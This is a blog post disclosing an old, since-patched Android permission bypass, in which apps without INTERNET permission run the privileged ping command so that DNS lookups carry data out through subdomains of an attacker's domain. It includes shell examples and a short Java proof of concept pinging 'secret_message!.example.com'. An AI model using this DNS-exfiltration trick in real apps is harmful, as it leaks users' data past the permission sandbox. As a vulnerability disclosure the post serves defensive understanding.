Although, It was already fixed on Android 4.X, I'd like to write article about this because I think this is very interesting technically.
I reported it to Google Sep. 2010 and be said my report makes no sense and is waste of time :-( But it looks be patched Nov. 2010 for 3.X and 4.X. Actually, I don't know this is still available or not for Android 2.X because I can't find discussion about this on the web. But I think still available on some devices.
I found this bypass on my Xperia SO-01B with Android 1.6. This is my first Android :-)
At that time, most of users' Androids were 2.X or 1.X and were affected by this.
Internet Permission
Generally, It is thought that Android handles all Android permission at Java. However, Android OS has a uid(AID_INET) to handle this permission.
For example, when you use nc command as an application which has no INTERNET permission, you will see permission error like below:
# su app_31However, vulnerable ping command allows applications that has no INTERNET permission to run ping command. Actually, when you run command as an application via adb shell, permissions are different from actual. This is an example of id command result:
su app_31
$ nc www.google.co.jp 80
nc www.google.co.jp 80
www.google.co.jp: forward host lookup failed: : Permission denied
uid=10035(app_35) gid=10035(app_35)If this application has INTERNET permission, inet will be listed in this result:
uid=10038(app_38) gid=10038(app_38) groups=3003(inet)Note: To confirm 'groups', you should run id command from Android application. Don't use adb shell.
Ping command
ping command requires elevated privilege to send and listen for control packets on a network interface. And old Android's ping command doesn't check uid. This means all application can run ping command with elevated privilege.
File permission of ping on Android:
-rwxr-sr-x root net_raw 26708 2011-05-04 23:23 ping
As a result, attacker can receive ping command but this packet includes few useful information. However, ping command resolves domain names before send ping packet because cannot access to the server without IP address. If an attacker has DNS servers, he can receive useful DNS query from the client. So, an attacker can receive any messages via sub domain like 'ping message.example.com':
And DNS servers can response arbitrary IP addresses, client application can receive attacker's command.
PoC:
public class PingActivity extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_ping);
Runtime r = Runtime.getRuntime();
Process p;
try {
String message = "secret_message!";
p = r.exec("ping -c 1 -W 1 "+message+".example.com");
} catch (IOException e1) {
}
//ping result
}
}
0 件のコメント:
コメントを投稿